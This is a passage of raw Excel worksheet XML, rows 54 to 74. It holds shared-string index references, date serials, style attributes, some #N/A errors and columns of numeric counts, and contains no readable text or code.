        <v>2080</v>
      </c>
    </row>
    <row r="54" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A54" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B54" s="51">
        <v>43641.685261736115</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D54" s="26">
        <v>133</v>
      </c>
      <c r="E54" s="1" t="s">
        <v>2095</v>
      </c>
      <c r="F54" s="26">
        <v>100</v>
      </c>
      <c r="G54" s="57" t="s">
        <v>2096</v>
      </c>
      <c r="H54" s="1" t="s">
        <v>2097</v>
      </c>
      <c r="I54" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J54" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K54" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L54" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M54" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N54" s="1"/>
      <c r="O54" s="1"/>
      <c r="P54" s="1"/>
      <c r="Q54" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R54" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S54" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T54" s="82">
        <v>2621</v>
      </c>
      <c r="U54" s="82">
        <v>4316</v>
      </c>
      <c r="V54" s="82">
        <v>4464</v>
      </c>
      <c r="W54" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="55" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A55" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B55" s="51">
        <v>43571.429527349537</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D55" s="26">
        <v>133</v>
      </c>
      <c r="E55" s="1" t="s">
        <v>2098</v>
      </c>
      <c r="F55" s="26">
        <v>103</v>
      </c>
      <c r="G55" s="57" t="s">
        <v>2099</v>
      </c>
      <c r="H55" s="1" t="s">
        <v>2100</v>
      </c>
      <c r="I55" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J55" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K55" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L55" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M55" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N55" s="1"/>
      <c r="O55" s="1"/>
      <c r="P55" s="1"/>
      <c r="Q55" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R55" s="82">
        <v>187473</v>
      </c>
      <c r="S55" s="82">
        <v>189931</v>
      </c>
      <c r="T55" s="82">
        <v>6174955</v>
      </c>
      <c r="U55" s="82">
        <v>7567660</v>
      </c>
      <c r="V55" s="82">
        <v>9331304</v>
      </c>
      <c r="W55" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="56" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A56" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B56" s="51">
        <v>43663.590451469907</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D56" s="26">
        <v>133</v>
      </c>
      <c r="E56" s="1" t="s">
        <v>2101</v>
      </c>
      <c r="F56" s="26">
        <v>103</v>
      </c>
      <c r="G56" s="57" t="s">
        <v>2102</v>
      </c>
      <c r="H56" s="1" t="s">
        <v>2103</v>
      </c>
      <c r="I56" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J56" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K56" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L56" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M56" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N56" s="1"/>
      <c r="O56" s="1"/>
      <c r="P56" s="1"/>
      <c r="Q56" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R56" s="82">
        <v>784</v>
      </c>
      <c r="S56" s="82">
        <v>769</v>
      </c>
      <c r="T56" s="82">
        <v>18118</v>
      </c>
      <c r="U56" s="82">
        <v>26509</v>
      </c>
      <c r="V56" s="82">
        <v>33871</v>
      </c>
      <c r="W56" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="57" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A57" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B57" s="51">
        <v>43664.501604895835</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D57" s="26">
        <v>133</v>
      </c>
      <c r="E57" s="1" t="s">
        <v>2104</v>
      </c>
      <c r="F57" s="26">
        <v>102</v>
      </c>
      <c r="G57" s="57" t="s">
        <v>2105</v>
      </c>
      <c r="H57" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="I57" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J57" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K57" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L57" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M57" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N57" s="1"/>
      <c r="O57" s="1"/>
      <c r="P57" s="1"/>
      <c r="Q57" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R57" s="82">
        <v>10589</v>
      </c>
      <c r="S57" s="82">
        <v>11588</v>
      </c>
      <c r="T57" s="82">
        <v>320031</v>
      </c>
      <c r="U57" s="82">
        <v>571540</v>
      </c>
      <c r="V57" s="82">
        <v>547180</v>
      </c>
      <c r="W57" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="58" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A58" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B58" s="51">
        <v>44291.773793194443</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>2107</v>
      </c>
      <c r="D58" s="26">
        <v>130</v>
      </c>
      <c r="E58" s="72" t="s">
        <v>2108</v>
      </c>
      <c r="F58" s="26">
        <v>112</v>
      </c>
      <c r="G58" s="57" t="s">
        <v>2109</v>
      </c>
      <c r="H58" s="1" t="s">
        <v>2110</v>
      </c>
      <c r="I58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="J58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="K58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O58" s="1"/>
      <c r="P58" s="1"/>
      <c r="Q58" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R58" s="82">
        <v>196</v>
      </c>
      <c r="S58" s="82">
        <v>230</v>
      </c>
      <c r="T58" s="82">
        <v>4394</v>
      </c>
      <c r="U58" s="82">
        <v>8177</v>
      </c>
      <c r="V58" s="82">
        <v>14475</v>
      </c>
      <c r="W58" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="59" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A59" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B59" s="51">
        <v>44291.773793182867</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>2107</v>
      </c>
      <c r="D59" s="26">
        <v>130</v>
      </c>
      <c r="E59" s="1" t="s">
        <v>2112</v>
      </c>
      <c r="F59" s="26">
        <v>113</v>
      </c>
      <c r="G59" s="57" t="s">
        <v>2113</v>
      </c>
      <c r="H59" s="1" t="s">
        <v>2114</v>
      </c>
      <c r="I59" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J59" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K59" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L59" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M59" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N59" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O59" s="1"/>
      <c r="P59" s="1"/>
      <c r="Q59" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R59" s="82">
        <v>1625</v>
      </c>
      <c r="S59" s="82">
        <v>1640</v>
      </c>
      <c r="T59" s="82">
        <v>23994</v>
      </c>
      <c r="U59" s="82">
        <v>44735</v>
      </c>
      <c r="V59" s="82">
        <v>57316</v>
      </c>
      <c r="W59" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="60" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A60" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B60" s="51">
        <v>44405.875200196759</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>2107</v>
      </c>
      <c r="D60" s="26">
        <v>130</v>
      </c>
      <c r="E60" s="1" t="s">
        <v>2115</v>
      </c>
      <c r="F60" s="26">
        <v>130</v>
      </c>
      <c r="G60" s="57" t="s">
        <v>2116</v>
      </c>
      <c r="H60" s="1" t="s">
        <v>2117</v>
      </c>
      <c r="I60" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J60" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K60" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L60" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M60" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N60" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O60" s="1"/>
      <c r="P60" s="1"/>
      <c r="Q60" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R60" s="82">
        <v>8417</v>
      </c>
      <c r="S60" s="82">
        <v>8389</v>
      </c>
      <c r="T60" s="82">
        <v>131128</v>
      </c>
      <c r="U60" s="82">
        <v>244548</v>
      </c>
      <c r="V60" s="82">
        <v>292486</v>
      </c>
      <c r="W60" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="61" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A61" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B61" s="51">
        <v>43838.924898101854</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>2118</v>
      </c>
      <c r="D61" s="26">
        <v>311</v>
      </c>
      <c r="E61" s="1" t="s">
        <v>2119</v>
      </c>
      <c r="F61" s="26">
        <v>101</v>
      </c>
      <c r="G61" s="57" t="s">
        <v>2120</v>
      </c>
      <c r="H61" s="1" t="s">
        <v>2121</v>
      </c>
      <c r="I61" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J61" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K61" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L61" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M61" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N61" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O61" s="1" t="s">
        <v>2122</v>
      </c>
      <c r="P61" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q61" s="1" t="s">
        <v>3649</v>
      </c>
      <c r="R61" s="82">
        <v>5196</v>
      </c>
      <c r="S61" s="82">
        <v>9501</v>
      </c>
      <c r="T61" s="82">
        <v>376079</v>
      </c>
      <c r="U61" s="82">
        <v>759234</v>
      </c>
      <c r="V61" s="82">
        <v>741750</v>
      </c>
      <c r="W61" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="62" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A62" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B62" s="51">
        <v>43728.726477164353</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>2118</v>
      </c>
      <c r="D62" s="26">
        <v>311</v>
      </c>
      <c r="E62" s="1" t="s">
        <v>2124</v>
      </c>
      <c r="F62" s="26">
        <v>100</v>
      </c>
      <c r="G62" s="57" t="s">
        <v>2125</v>
      </c>
      <c r="H62" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I62" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J62" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K62" s="1" t="s">
        <v>35</v>
      </c>
      <c r="L62" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M62" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N62" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O62" s="1" t="s">
        <v>1229</v>
      </c>
      <c r="P62" s="1" t="s">
        <v>812</v>
      </c>
      <c r="Q62" s="1" t="s">
        <v>3649</v>
      </c>
      <c r="R62" s="82">
        <v>2684</v>
      </c>
      <c r="S62" s="82">
        <v>2669</v>
      </c>
      <c r="T62" s="82">
        <v>44177</v>
      </c>
      <c r="U62" s="82">
        <v>71061</v>
      </c>
      <c r="V62" s="82">
        <v>80816</v>
      </c>
      <c r="W62" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="63" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A63" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B63" s="51">
        <v>43644.622735775461</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="D63" s="26">
        <v>118</v>
      </c>
      <c r="E63" s="1" t="s">
        <v>2127</v>
      </c>
      <c r="F63" s="26">
        <v>103</v>
      </c>
      <c r="G63" s="57" t="s">
        <v>2128</v>
      </c>
      <c r="H63" s="1" t="s">
        <v>2129</v>
      </c>
      <c r="I63" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J63" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K63" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L63" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M63" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N63" s="1"/>
      <c r="O63" s="1"/>
      <c r="P63" s="1"/>
      <c r="Q63" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R63" s="82">
        <v>403</v>
      </c>
      <c r="S63" s="82">
        <v>359</v>
      </c>
      <c r="T63" s="82">
        <v>9090</v>
      </c>
      <c r="U63" s="82">
        <v>14490</v>
      </c>
      <c r="V63" s="82">
        <v>21238</v>
      </c>
      <c r="W63" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="64" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A64" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B64" s="51">
        <v>43663.666035624999</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="D64" s="26">
        <v>118</v>
      </c>
      <c r="E64" s="1" t="s">
        <v>2130</v>
      </c>
      <c r="F64" s="26">
        <v>104</v>
      </c>
      <c r="G64" s="57" t="s">
        <v>2131</v>
      </c>
      <c r="H64" s="1" t="s">
        <v>2132</v>
      </c>
      <c r="I64" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J64" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K64" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L64" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M64" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N64" s="1"/>
      <c r="O64" s="1"/>
      <c r="P64" s="1"/>
      <c r="Q64" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R64" s="82">
        <v>931</v>
      </c>
      <c r="S64" s="82">
        <v>801</v>
      </c>
      <c r="T64" s="82">
        <v>5837</v>
      </c>
      <c r="U64" s="82">
        <v>9057</v>
      </c>
      <c r="V64" s="82">
        <v>9398</v>
      </c>
      <c r="W64" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="65" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A65" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B65" s="51">
        <v>43644.622735752317</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="D65" s="26">
        <v>118</v>
      </c>
      <c r="E65" s="1" t="s">
        <v>2133</v>
      </c>
      <c r="F65" s="26">
        <v>103</v>
      </c>
      <c r="G65" s="57" t="s">
        <v>2134</v>
      </c>
      <c r="H65" s="1" t="s">
        <v>2135</v>
      </c>
      <c r="I65" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J65" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K65" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L65" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M65" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N65" s="1"/>
      <c r="O65" s="1"/>
      <c r="P65" s="1"/>
      <c r="Q65" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R65" s="82">
        <v>14335</v>
      </c>
      <c r="S65" s="82">
        <v>15679</v>
      </c>
      <c r="T65" s="82">
        <v>381637</v>
      </c>
      <c r="U65" s="82">
        <v>567324</v>
      </c>
      <c r="V65" s="82">
        <v>537299</v>
      </c>
      <c r="W65" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="66" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A66" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B66" s="51">
        <v>43644.622735763885</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="D66" s="26">
        <v>118</v>
      </c>
      <c r="E66" s="1" t="s">
        <v>2136</v>
      </c>
      <c r="F66" s="26">
        <v>103</v>
      </c>
      <c r="G66" s="57" t="s">
        <v>2137</v>
      </c>
      <c r="H66" s="1" t="s">
        <v>2138</v>
      </c>
      <c r="I66" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J66" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K66" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L66" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M66" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N66" s="1"/>
      <c r="O66" s="1"/>
      <c r="P66" s="1"/>
      <c r="Q66" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R66" s="82">
        <v>7611</v>
      </c>
      <c r="S66" s="82">
        <v>7403</v>
      </c>
      <c r="T66" s="82">
        <v>164662</v>
      </c>
      <c r="U66" s="82">
        <v>204313</v>
      </c>
      <c r="V66" s="82">
        <v>226194</v>
      </c>
      <c r="W66" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="67" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A67" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B67" s="51">
        <v>43644.682801006944</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="D67" s="26">
        <v>118</v>
      </c>
      <c r="E67" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="F67" s="26">
        <v>105</v>
      </c>
      <c r="G67" s="57" t="s">
        <v>2140</v>
      </c>
      <c r="H67" s="1" t="s">
        <v>2141</v>
      </c>
      <c r="I67" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J67" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K67" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L67" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M67" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N67" s="1"/>
      <c r="O67" s="1"/>
      <c r="P67" s="1"/>
      <c r="Q67" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R67" s="82">
        <v>52041</v>
      </c>
      <c r="S67" s="82">
        <v>50097</v>
      </c>
      <c r="T67" s="82">
        <v>993268</v>
      </c>
      <c r="U67" s="82">
        <v>1465063</v>
      </c>
      <c r="V67" s="82">
        <v>1467430</v>
      </c>
      <c r="W67" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="68" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A68" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B68" s="51">
        <v>44078.847690104165</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>2142</v>
      </c>
      <c r="D68" s="26">
        <v>111</v>
      </c>
      <c r="E68" s="1" t="s">
        <v>2143</v>
      </c>
      <c r="F68" s="26">
        <v>111</v>
      </c>
      <c r="G68" s="57" t="s">
        <v>1669</v>
      </c>
      <c r="H68" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="I68" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J68" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K68" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L68" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M68" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N68" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O68" s="1"/>
      <c r="P68" s="1"/>
      <c r="Q68" s="1" t="s">
        <v>3650</v>
      </c>
      <c r="R68" s="82">
        <v>40529</v>
      </c>
      <c r="S68" s="82">
        <v>48944</v>
      </c>
      <c r="T68" s="82">
        <v>526150</v>
      </c>
      <c r="U68" s="82">
        <v>973026</v>
      </c>
      <c r="V68" s="82">
        <v>1507346</v>
      </c>
      <c r="W68" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="69" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A69" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B69" s="51">
        <v>43776.697613124998</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>2147</v>
      </c>
      <c r="D69" s="26">
        <v>103</v>
      </c>
      <c r="E69" s="1" t="s">
        <v>2148</v>
      </c>
      <c r="F69" s="26">
        <v>103</v>
      </c>
      <c r="G69" s="57" t="s">
        <v>2149</v>
      </c>
      <c r="H69" s="1" t="s">
        <v>2150</v>
      </c>
      <c r="I69" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J69" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K69" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L69" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M69" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N69" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O69" s="1"/>
      <c r="P69" s="1"/>
      <c r="Q69" s="1" t="s">
        <v>3651</v>
      </c>
      <c r="R69" s="82">
        <v>47672</v>
      </c>
      <c r="S69" s="82">
        <v>45731</v>
      </c>
      <c r="T69" s="82">
        <v>841878</v>
      </c>
      <c r="U69" s="82">
        <v>1568125</v>
      </c>
      <c r="V69" s="82">
        <v>1628618</v>
      </c>
      <c r="W69" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="70" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A70" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B70" s="51">
        <v>43791.179654837964</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>2152</v>
      </c>
      <c r="D70" s="26">
        <v>110</v>
      </c>
      <c r="E70" s="1" t="s">
        <v>2153</v>
      </c>
      <c r="F70" s="26">
        <v>110</v>
      </c>
      <c r="G70" s="57" t="s">
        <v>2154</v>
      </c>
      <c r="H70" s="1" t="s">
        <v>2155</v>
      </c>
      <c r="I70" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J70" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K70" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L70" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M70" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N70" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O70" s="1"/>
      <c r="P70" s="1"/>
      <c r="Q70" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R70" s="82">
        <v>8154</v>
      </c>
      <c r="S70" s="82">
        <v>7637</v>
      </c>
      <c r="T70" s="82">
        <v>122095</v>
      </c>
      <c r="U70" s="82">
        <v>203064</v>
      </c>
      <c r="V70" s="82">
        <v>226212</v>
      </c>
      <c r="W70" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="71" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A71" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B71" s="51">
        <v>43893.137950798613</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>2156</v>
      </c>
      <c r="D71" s="26">
        <v>111</v>
      </c>
      <c r="E71" s="1" t="s">
        <v>2157</v>
      </c>
      <c r="F71" s="26">
        <v>111</v>
      </c>
      <c r="G71" s="57" t="s">
        <v>2158</v>
      </c>
      <c r="H71" s="1" t="s">
        <v>2159</v>
      </c>
      <c r="I71" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J71" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K71" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L71" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M71" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N71" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O71" s="1"/>
      <c r="P71" s="1"/>
      <c r="Q71" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R71" s="82">
        <v>2901</v>
      </c>
      <c r="S71" s="82">
        <v>2813</v>
      </c>
      <c r="T71" s="82">
        <v>45338</v>
      </c>
      <c r="U71" s="82">
        <v>82349</v>
      </c>
      <c r="V71" s="82">
        <v>100872</v>
      </c>
      <c r="W71" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="72" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A72" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B72" s="51">
        <v>43663.644034953701</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="D72" s="26">
        <v>103</v>
      </c>
      <c r="E72" s="1" t="s">
        <v>2161</v>
      </c>
      <c r="F72" s="26">
        <v>102</v>
      </c>
      <c r="G72" s="57" t="s">
        <v>2162</v>
      </c>
      <c r="H72" s="1" t="s">
        <v>2163</v>
      </c>
      <c r="I72" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J72" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K72" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L72" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M72" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N72" s="1"/>
      <c r="O72" s="1"/>
      <c r="P72" s="1"/>
      <c r="Q72" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R72" s="82">
        <v>761</v>
      </c>
      <c r="S72" s="82">
        <v>833</v>
      </c>
      <c r="T72" s="82">
        <v>9286</v>
      </c>
      <c r="U72" s="82">
        <v>30141</v>
      </c>
      <c r="V72" s="82">
        <v>52382</v>
      </c>
      <c r="W72" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="73" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A73" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B73" s="51">
        <v>43644.598832650459</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="D73" s="26">
        <v>103</v>
      </c>
      <c r="E73" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="F73" s="26">
        <v>100</v>
      </c>
      <c r="G73" s="57" t="s">
        <v>2165</v>
      </c>
      <c r="H73" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="I73" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J73" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K73" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L73" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M73" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N73" s="1"/>
      <c r="O73" s="1"/>
      <c r="P73" s="1"/>
      <c r="Q73" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R73" s="82">
        <v>204</v>
      </c>
      <c r="S73" s="82">
        <v>295</v>
      </c>
      <c r="T73" s="82">
        <v>4016</v>
      </c>
      <c r="U73" s="82">
        <v>6321</v>
      </c>
      <c r="V73" s="82">
        <v>11652</v>
      </c>
      <c r="W73" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="74" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A74" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B74" s="51">
        <v>43644.598832673611</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="D74" s="26">
        <v>103</v>
      </c>
      <c r="E74" s="1" t="s">
        <v>2167</v>
      </c>
      <c r="F74" s="26">
        <v>100</v>
      </c>
      <c r="G74" s="57" t="s">
        <v>44</v>
      </c>
      <c r="H74" s="1" t="s">
        <v>2168</v>
      </c>
      <c r="I74" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J74" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K74" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L74" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M74" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N74" s="1"/>
      <c r="O74" s="1"/>
      <c r="P74" s="1"/>
      <c r="Q74" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R74" s="82">
        <v>810083</v>
      </c>
      <c r="S74" s="82">
        <v>841425</v>
      </c>
      <c r="T74" s="82">
        <v>22365500</v>
      </c>
      <c r="U74" s="82">
        <v>29405581</v>
      </c>
      <c r="V74" s="82">
        <v>35310545</v>
      </c>
      <c r="W74" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="75" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
